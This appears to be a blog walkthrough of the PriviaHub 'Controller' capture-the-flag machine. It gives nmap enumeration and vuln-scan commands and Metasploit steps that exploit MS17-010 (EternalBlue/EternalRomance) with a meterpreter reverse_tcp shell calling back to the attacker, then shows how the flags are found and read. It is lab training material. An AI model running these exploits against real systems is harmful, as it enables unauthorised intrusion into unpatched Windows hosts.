Open in app

Sign in

Write

Sign in

PriviaHub Walkthrough : Controller

Emre Alkaya
4 min readOct 24, 2020

--

Today we will be looking at controller from PriviaHub. This machine easy but it can be a good start for people who wants to be penetration testers.

Summary :

  • There is an important vulnerable eternal blue(ms17–010) inside system.
  • There are two important open ports on machine 139 and 445.
  • There is an open port 88/tcp kerberos.
  • There is an open port 389/tcp Active Directory LDAP etc.
  • SMB on ports 139 (NetBios) and port 445
  • CVE-2017–0143 Risk factor = High
  • EternalBlue is both the given name to a series of Microsoft software vulnerabilities and the exploit created by the NSA as a cyberattack tool. Although the EternalBlue exploit — officially named MS17–010 by Microsoft — affects only Windows operating systems, anything that uses the SMBv1 (Server Message Block version 1) file-sharing protocol is technically at risk of being targeted for ransomware and other cyberattacks.
  • Basic windows privilege escalation with shell command.

Let’s start with this machine.

The “controller” machine IP is 172.16.71.214

We are going to apply the usual methodology of penetration testing as we have applied before. Let’s start with enumeration learn as much about the machine as possible.

Enumaration

We are going to start with the nmap scan to gather more information about the services and version running on this machine.

nmap -T4 -A -p- 172.16.71.214

All information about this machine.

Let’s start again do an nmap script vuln scan.

nmap --script vuln 172.16.71.214 -vv

As we can see, vulnerable remote code execution (ms17–010).

IDs : CVE-2017–0143

Risk factor : High

We have go to research this vulnerable ms17–010.

We can search cve details CVE-2017–0143.

Result :

Exploitation

While doing this, we get help from the search in metasploit.

msfconsole
search eternalromance

We learned which module to use above and we choose it.

use 1
set rhosts target ip
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 443
run

We are inside the machine.

Privilege Escalation

And then we can write sysinfo to learn about this machine system info.

We can use Shell command for control through windows.

You can find where is each all flag by using the Windows *flag*txt /s command.

dir *file*txt /s

You can view the contents of each flag by using the Windows type command.

type file.txt

We enumerate to grab the root.txt and user.txt flags.

We found the user flag.

We found the Root flag.

And our last step here is getting the root flag.

Hope you guys enjoyed this tutorial, let me know if you try this out. Follow me for more projects like this!

Walkthrough
Cybersecurity
Exploitation
Capture The Flag
Penetration Testing

--

--

Emre Alkaya
Emre Alkaya

Written by Emre Alkaya

88 Followers
7 Following

Interested in offsec

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams